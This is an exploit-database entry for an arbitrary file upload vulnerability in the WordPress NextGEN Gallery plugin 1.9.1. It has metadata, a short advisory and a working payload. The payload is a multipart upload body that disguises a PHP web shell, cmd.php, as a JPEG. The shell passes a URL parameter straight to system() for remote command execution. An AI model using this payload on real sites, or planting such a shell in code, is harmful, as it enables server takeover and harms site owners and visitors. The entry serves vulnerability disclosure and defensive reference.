WordPress Plugin NextGEN Gallery 1.9.1 - 'photocrati_ajax' Arbitrary File Upload

Author: SANTHO
type: webapps
platform: php
port: 
date_added: 2014-05-19 
date_updated: 2016-01-15 
verified: 1 
codes: OSVDB-108852 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/68414/info

The NextGEN Gallery plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in an arbitrary code execution within the context of the vulnerable application.

Versions prior to NextGEN Gallery 2.0.63 are vulnerable.

cmd.php.jpg
-----------------------------2427186578189
Content-Disposition: form-data; name="file"; filename="cmd.php"
Content-Type: image/jpeg

<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<?
if($_GET['cmd']) {
  system($_GET['cmd']);
  }
?>
</pre>
</BODY></HTML>